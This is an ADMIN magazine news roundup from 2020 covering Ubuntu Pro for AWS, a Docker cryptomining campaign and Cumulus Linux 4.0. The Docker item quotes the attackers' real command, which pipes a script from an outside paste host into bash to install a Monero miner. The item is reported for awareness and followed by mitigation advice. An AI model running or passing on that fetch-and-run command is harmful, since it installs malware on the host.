News for Admins

Tech News

Article from ADMIN 55/2020
By
In the news: Canonical now offers an Ubuntu Pro image for AWS; Vulnerable Docker instance sought out by Monero malware; Cumulus Networks enhances their network-specific Linux; and SUSE adds SUSE Linux Enterprise to the Oracle Cloud Infrastructure.

Canonical Now Offers an Ubuntu Pro Image for AWS

Ubuntu rules the cloud. According to The Cloud Market (https://thecloudmarket.com/stats#/by_platform_definition), Ubuntu is the most widely used cloud image used on the Amazon Elastic Compute Cloud (with nearly 370K images deployed). Not one to be satisfied with being at the top of the digital heap, Canonical (https://canonical.com/) – the company behind Ubuntu (https://ubuntu.com/) – has released a new version of their venerable Ubuntu platform.

Ubuntu Pro was created specifically for Amazon Web Services. This new image ships with the Canonical standard Ubuntu Amazon Machine Image and layers on top of that security and compliance subscriptions. Specifically, Ubuntu Pro includes:

  • Up to 10 years of package and security updates for Ubuntu 18.04, and up to eight years for 14.04 and 16.04
  • Kernel Livepatch for continuous security patching without reboots
  • Customized FIPS and Common Criteria EAL-compliant components (for environments that require FedRAMP, PCI, HIPAA, and ISO compliance)
  • Patch coverage for Ubuntu's infrastructure and app repositories for all types of open source services
  • System management with Landscape
  • Integration with AWS security and compliance features, such as AWS Security Hub and AWS CloudTrail (applicable from 2020)
  • Subscriptions available for Ubuntu Advantage support packages (https://ubuntu.com/support)

Ubuntu Pro is available via the AWS Marketplace (https://aws.amazon.com/marketplace/search/results?x=0&y=0&searchTerms=ubuntu+pro) and the prices range from free to $0.33 per hour (for software plus AWS usage fees).

Vulnerable Docker Instance Sought Out by Monero Malware

Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector (https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/) that would allow the injection of Monero mining programs. During the two days the target campaign was live, over 14.82 Monero (XMR) was mined. That amount translates to roughly $800.

Although that amount wasn't enough to turn heads, what was significant in this vulnerability was the amount of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run the command

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

(which downloads a bash script that would install the XMRig cryptocurrency miner).

The issue was discovered by security firm Bad Packets LLC. Bad Packets also found that the malware contained a self-defense measure that not only disables security, but shuts down processes associated with rival cryptocurrency-mining botnets.

To avoid such a vulnerability, Troy Mursch (cofounder and chief research officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the Internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.

Cumulus Networks Enhances Their Network-Specific Linux

Cumulus Linux is a full-featured Linux operating system designed specifically for the networking industry. Cumulus supports a wide array of networking hardware (https://cumulusnetworks.com/products/hardware-compatibility-list/) and is fully compliant with the Open Compute Project's networking specification (including the Open Network Install Environment).

With the release of Cumulus Linux 4.0, there are a number of changes, so make sure you are informed before you upgrade.

First and foremost, Cumulus Linux 4.0 is now based on Debian Buster (version 10) and includes the Linux 4.19 kernel. Along with this kernel, Meltdown and Spectre fixes are finally (and fully) up to date.

The next most important advancement for Cumulus Linux is the integration of switchdev. Switchdev is an open source in-kernel abstraction model that provides a standardized method of programming switch ASICs and speeds up development time.

Cumulus Linux 4.0 has added a few new supported platforms, such as Edgecore Minipack AS8000 (100G Tomahawk 3), Mellanox SN3700C (100G Spectrum-2), Mellanox SN3700 (200G Spectrum-2), and HPE SN2345M (100G Spectrum).

Other new features to Cumulus Linux include the ability to use apt-get upgrade to a specific kernel release, EVPN BUM traffic handling (using PIM-SM on Broadcom switches), PIM active-active with MLAG, port security on Broadcom switches, WJH support on Mellanox switches (to stream detailed/contextual telemetry of off-box analysis), a new backup and restore utility, FRRouting daemons and daemons.conf files have been merged into the daemons file, Zebra now enabled by default (in daemons file), MAC learning is disabled by default on all VXLAN bridge ports, and much more.

Read about all of the new changes to Cumulus Linux online (https://support.cumulusnetworks.com/hc/en-us/articles/360038231814-What-s-New-and-Different-in-Cumulus-Linux-4-0-0?mobile_site=true).

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy ADMIN Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

comments powered by Disqus